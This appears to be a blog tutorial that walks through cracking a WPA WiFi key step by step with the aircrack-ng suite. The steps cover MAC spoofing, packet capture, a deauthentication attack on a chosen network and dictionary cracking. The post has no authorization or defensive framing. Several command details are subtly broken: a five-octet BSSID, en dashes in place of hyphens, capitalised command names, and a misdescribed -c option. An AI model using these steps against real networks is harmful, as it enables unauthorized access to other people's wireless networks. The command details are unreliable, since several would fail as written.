WiFi Protected Access, or WPA as it's commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used.In this tutorial, we will use the AirCrack suite to crack a WPA key. The AirCrack suite (or AirCrackNG as it's commonly referred) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key.
How to do it...
Let's begin the process of using AirCrack to crack a network session secured by WPA.1. Open a terminal window and bring up a list of wireless network interfaces.
airmon-ng
2. Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.
3. Next, we need to stop the wlan0 interface and take it down.
airmon-ng stop wlan0
ifconfig wlan0 down
4. Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55.
macchanger -–mac 00:11:22:33:44:55 wlan0
5. Now we need to restart airmon-ng.
airmon-ng start wlan0
6. Next, we will use airodump to locate the available wireless networks nearby.
airodump-ng wlan0
7. A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10.
8. Now we run airodump and copy the information for the selected BSSID to a file.
We will utilize the following options:
–c allows us to select our channel. In this case, we use 10
–w allows us to select the name of our file. In this case, we have chosen
wirelessattack.
–bssid allows us to select our BSSID. In this case, we will paste
09:AC:90:AB:78 from the clipboard.
airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0
9. A new terminal window will open displaying the output from the previous command.
Leave this window open.
10. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax:
aireplay-ng –deauth 1 –a [BSSID] –c [our chosen MAC address] [Interface].
This process may take a few moments.
Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0
11. Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case, the file's name is wirelessattack.cap.
Aircrack-ng –w ./wordlist.lst wirelessattack.cap
That's it!
No comments:
Post a Comment